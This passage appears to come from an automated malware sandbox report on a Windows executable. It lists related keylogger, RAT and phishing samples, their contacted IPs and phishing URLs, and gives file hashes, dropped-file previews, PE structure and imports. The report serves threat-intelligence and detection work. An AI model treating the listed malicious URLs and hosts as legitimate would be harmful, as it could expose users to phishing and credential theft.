                                                                                                              xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              FUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              https://glfbanks.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • 149.154.167.220
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              TELEGRAMRUV7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              FUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              https://glfbanks.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • 149.154.167.220
                                                                                                              CLOUDFLARENETUSV7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.32.1
                                                                                                              https://services221.com/mm/Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • 104.17.25.14
                                                                                                              https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8fGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 104.17.25.14
                                                                                                              https://www.shinsengumiusa.com/mrloskieGet hashmaliciousUnknownBrowse
                                                                                                              • 188.114.96.3
                                                                                                              https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8fGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 104.17.25.14
                                                                                                              https://payhip.com/b/J12iX/purchasedGet hashmaliciousUnknownBrowse
                                                                                                              • 104.17.25.14
                                                                                                              upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.48.1
                                                                                                              jG8N6WDJOx.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.13.205
                                                                                                              2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.16.1
                                                                                                              6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.48.1
                                                                                                              ORACLE-BMC-31898USSABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 158.101.44.242
                                                                                                              xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 193.122.6.168
                                                                                                              4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 158.101.44.242
                                                                                                              ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 193.122.6.168
                                                                                                              hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 193.122.6.168
                                                                                                              9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.6.168
                                                                                                              y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.130.0
                                                                                                              FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 193.122.6.168
                                                                                                              m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 193.122.6.168
                                                                                                              FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.6.168
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adV7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.80.1
                                                                                                              upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.80.1
                                                                                                              2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.80.1
                                                                                                              6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.80.1
                                                                                                              SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.80.1
                                                                                                              oEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.80.1
                                                                                                              FylY1FW6fl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.80.1
                                                                                                              v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.80.1
                                                                                                              xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.80.1
                                                                                                              4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.80.1
                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eV7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              jG8N6WDJOx.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 149.154.167.220
                                                                                                              2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              HGhGAjCVw5.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 149.154.167.220
                                                                                                              4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              No context
                                                                                                              Process:C:\Users\user\Desktop\lsc5QN46NH.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):201698
                                                                                                              Entropy (8bit):7.985865403736139
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:NY3gz8rRCvpXNI6tsKml/9Du4XaHfQhVhJEmb0jPR:i3KIRWNI4mllDthVEmAj5
                                                                                                              MD5:9C014742DDA3DBC988CC896CC7461670
                                                                                                              SHA1:94AA5CF6FFB9360D6AFBACFF7114F5D13F5D6BB2
                                                                                                              SHA-256:936B2CE0EC2A6111DA046B9CD747719BC93C7C43E0B80670553584BBA502649D
                                                                                                              SHA-512:3ADEFDDCDA0627DAD9932D6491909FA65787D8CC011009EA359E34CD18C4144E2679F442FD2445F26F10C31C253A6C1306EBA3B60CAC2326680274C14C7759AE
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:EA06..,..D.t...0.Q...W..B..i3jeN.I.......X..)T)...i`...\.X.S=tz_.....&0...P..b...fW!.I-r..~u_.Y...*.,..$.hDr.i.Ig.K..{L..,fC&._......@.S..}......!..."...M....>.A..!3....a...}4..j.M?@.......):..*.X$[.....7..6}.....U&..=F.!..@....s...sF..j..WJl.-_...D....U...U.o!..*5.M8.c5...Q..:.6.J.........+@....i4...f(.&...)4.@..&..~.:X.W.7..p..4.[..,..{2.E@....R..../..=.P'...GCM..k ...0.P..>.]*.Q.P..y...8.K...0.a'.,5.P....S..l....j.,eo ..k1......$....i?k..E;..X3....)..)T...-N..."..T..#......{..u.5?..y.LL..Q.V.>...^..1R...m#.x...>.)...?....3..c..Jn..S.bf...;W0.R...5......;...w.....|...y..P........d...2.Y?.S....2....}..U........'.A..S..'g....T...)3.X.T...gE..)<...#..S.}...[...j..G....`3.--..$..&..U.Z..<..5..r-4......rp.b.q.n!.*...R........_...N#......E,....T\]+...of..M>...`.{]?:-x..e.X..[]..>.....2...Y........_..y....I..}..Qg<.....Y...d....iir..R....g.>4:...r....._D.j.....U..g....aI.qb.Z...:.j...."%..Q..9...........!....X'......G/w.L6......oy..V.!w...;..0
                                                                                                              Process:C:\Users\user\Desktop\lsc5QN46NH.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):207872
                                                                                                              Entropy (8bit):7.8347264690944565
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:96Vy7Ij5jtGkTZjDdCio6AqRVqRusOcDOF/U0pUieO750rB3eQJe0U4ArAObKFsw:+IiLGC7Ch6nUus5w3p/PE3VJe7PM6w
                                                                                                              MD5:1AEB4D9D9B26FDA8D3960A8709A06CED
                                                                                                              SHA1:3DB4DE388302715D528DA6F7329ADC3A0B355448
                                                                                                              SHA-256:485D7ADD3CC1FD5182E94E6EE2CA2990CCCAB7DDFB4746815081277D2CFAE312
                                                                                                              SHA-512:A127A0969412BC3DAE988098ED6D783FB4143B53CBDE00DA9F29930BB7BDDC37B066D34FD48F8364EFC0B84FD9D796DC127C678A8D9D7019CF05BA962DCB0907
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:...J[1T04FUI..JB.1I6LSQI.JX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB.1I6BL.GK.Q.u.1..h.P#1.A;Y+!0$k)9_:_Df7,uJ?,.X'....i&%<Tz==LqIU8JB71!&.~}8.4t@.N.7.7g.5<.@.HG..7`;.OxA.8.8.FxaYOUG.-cj"4.@.N.e.7xI.<eX*^`".7KJX1T00FUIU8JB71...5QIKJ.tT0|GQI!.J.71I6LSQI.J{0_19FU.T8J.61I6LS~.KJX!T00.TIU8.B7!I6LQQINJX1T00FPIU8JB71IFOSQMKJ..V02FU.U8ZB7!I6LSAIKZX1T00FEIU8JB71I6LS.\IJ.1T00&WI.3KB71I6LSQIKJX1T00FUIU8JB71..MSMIKJX1T00FUIU8JB71I6LSQIKJX1.=2F.IU8JB71I6LSQ.JJ.0T00FUIU8JB71I6LSQIKJX1T00F{=0@>B71Q.MSQYKJX.U00BUIU8JB71I6LSQIkJXQzBT'!(U8./71I.MSQ'KJX.U00FUIU8JB71I6.SQ.e.9E500F.yU8Jb51I LSQCIJX1T00FUIU8JBw1I.b!";(JX1.;1FU)W8JN61I.NSQIKJX1T00FUI.8J.71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00FUIU8JB71I6LSQIKJX1T00F
                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):0.1843254168738535
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:lsc5QN46NH.exe
                                                                                                              File size:80'740'352 bytes
                                                                                                              MD5:7a6425553456c5f24bb5c8e235574c72
                                                                                                              SHA1:6d825e1a1238c4a4f26966c281507e5e704c5500
                                                                                                              SHA256:6b5bfda5580a6bd8ec3062f4d33b09c0f91722d824e80ae0cb8d47e8b1b2fcb7
                                                                                                              SHA512:1da622c9448297a1b2971dab7415586f9e31e113c8e39404d25ba9937e9b423a2f8d01ce772590a796ad9642c04b66a09f8b044d1b5707e696f686fc61cc6e47
                                                                                                              SSDEEP:24576:uu6J33O0c+JY5UZ+XC0kGso6Fa/ROfRojRhKC8CcXWY:gu0c++OCvkGs9Fa/syHKC8CrY
                                                                                                              TLSH:3A08BE2273DDC360CB669173BF6AB7016EBF3C614630B85B2F980D7DA950161262D7A3
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                                              Icon Hash:aaf3e3e3938382a0
                                                                                                              Entrypoint:0x427dcd
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x67598DA8 [Wed Dec 11 13:03:36 2024 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:5
                                                                                                              OS Version Minor:1
                                                                                                              File Version Major:5
                                                                                                              File Version Minor:1
                                                                                                              Subsystem Version Major:5
                                                                                                              Subsystem Version Minor:1
                                                                                                              Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                                              Instruction
                                                                                                              call 00007FAE34B38D7Ah
                                                                                                              jmp 00007FAE34B2BB44h
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              push edi
                                                                                                              push esi
                                                                                                              mov esi, dword ptr [esp+10h]
                                                                                                              mov ecx, dword ptr [esp+14h]
                                                                                                              mov edi, dword ptr [esp+0Ch]
                                                                                                              mov eax, ecx
                                                                                                              mov edx, ecx
                                                                                                              add eax, esi
                                                                                                              cmp edi, esi
                                                                                                              jbe 00007FAE34B2BCCAh
                                                                                                              cmp edi, eax
                                                                                                              jc 00007FAE34B2C02Eh
                                                                                                              bt dword ptr [004C31FCh], 01h
                                                                                                              jnc 00007FAE34B2BCC9h
                                                                                                              rep movsb
                                                                                                              jmp 00007FAE34B2BFDCh
                                                                                                              cmp ecx, 00000080h
                                                                                                              jc 00007FAE34B2BE94h
                                                                                                              mov eax, edi
                                                                                                              xor eax, esi
                                                                                                              test eax, 0000000Fh
                                                                                                              jne 00007FAE34B2BCD0h
                                                                                                              bt dword ptr [004BE324h], 01h
                                                                                                              jc 00007FAE34B2C1A0h
                                                                                                              bt dword ptr [004C31FCh], 00000000h
                                                                                                              jnc 00007FAE34B2BE6Dh
                                                                                                              test edi, 00000003h
                                                                                                              jne 00007FAE34B2BE7Eh
                                                                                                              test esi, 00000003h
                                                                                                              jne 00007FAE34B2BE5Dh
                                                                                                              bt edi, 02h
                                                                                                              jnc 00007FAE34B2BCCFh
                                                                                                              mov eax, dword ptr [esi]
                                                                                                              sub ecx, 04h
                                                                                                              lea esi, dword ptr [esi+04h]
                                                                                                              mov dword ptr [edi], eax
                                                                                                              lea edi, dword ptr [edi+04h]
                                                                                                              bt edi, 03h
                                                                                                              jnc 00007FAE34B2BCD3h
                                                                                                              movq xmm1, qword ptr [esi]
                                                                                                              sub ecx, 08h
                                                                                                              lea esi, dword ptr [esi+08h]
                                                                                                              movq qword ptr [edi], xmm1
                                                                                                              lea edi, dword ptr [edi+08h]
                                                                                                              test esi, 00000007h
                                                                                                              je 00007FAE34B2BD25h
                                                                                                              bt esi, 03h
                                                                                                              jnc 00007FAE34B2BD78h
                                                                                                              Programming Language:
                                                                                                              • [ASM] VS2013 build 21005
                                                                                                              • [ C ] VS2013 build 21005
                                                                                                              • [C++] VS2013 build 21005
                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                              • [ASM] VS2013 UPD4 build 31101
                                                                                                              • [RES] VS2013 build 21005
                                                                                                              • [LNK] VS2013 UPD4 build 31101
                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x4a230.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1120000x711c.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rsrc0xc70000x4a2300x4a400cb4db07a722385fee1bc74e85f5e0044False0.9107415298821548data7.856758218360419IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0x1120000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                              RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                              RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                              RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                              RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                              RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                              RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                              RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                              RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                              RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                              RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                              RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                                                              RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                              RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                                                              RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                              RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                              RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                              RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                              RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                              RT_RCDATA0xcf7b80x414f5data1.0003401754707317
                                                                                                              RT_GROUP_ICON0x110cb00x76dataEnglishGreat Britain0.6610169491525424
                                                                                                              RT_GROUP_ICON0x110d280x14dataEnglishGreat Britain1.25
                                                                                                              RT_GROUP_ICON0x110d3c0x14dataEnglishGreat Britain1.15
                                                                                                              RT_GROUP_ICON0x110d500x14dataEnglishGreat Britain1.25
                                                                                                              RT_VERSION0x110d640xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                              RT_MANIFEST0x110e400x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                                              DLLImport
                                                                                                              WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                              VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                              WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                              PSAPI.DLLGetProcessMemoryInfo
                                                                                                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                              USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                              UxTheme.dllIsThemeActive
